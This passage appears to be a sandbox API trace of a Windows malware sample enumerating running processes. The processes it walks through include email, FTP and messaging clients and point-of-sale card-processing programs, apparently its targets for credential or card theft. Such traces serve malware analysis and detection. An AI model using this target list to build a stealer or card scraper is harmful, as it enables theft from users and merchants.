cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0292.800] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0292.803] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0292.806] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0292.920] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0292.923] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0292.925] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0292.927] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0292.929] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0292.932] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0292.964] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0292.966] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0292.968] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0292.971] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0292.973] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0292.975] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0292.977] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0292.979] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0292.984] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0292.988] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0292.991] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0292.993] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0292.999] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0293.002] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0293.004] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0293.007] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0293.010] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0293.093] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0293.095] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0293.096] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0293.099] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0293.102] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0293.107] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0293.110] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0293.112] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0293.115] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0293.117] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0293.121] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0293.126] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.129] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0293.131] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0293.133] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0293.169] CloseHandle (hObject=0x21f8) returned 1 [0293.169] Sleep (dwMilliseconds=0x64) [0293.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0293.297] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.300] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.302] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.304] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.306] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.312] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.314] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.316] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0293.318] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0293.320] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.329] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.331] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.333] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.336] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.338] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.343] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.345] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.347] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.349] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.352] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.357] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0293.359] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0293.360] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.362] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0293.363] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0293.365] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0293.366] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0293.368] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0293.374] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.376] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0293.378] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.379] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.381] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.383] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0293.384] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0293.386] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0293.390] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0293.392] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0293.393] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0293.395] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0293.396] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0293.398] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0293.400] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: 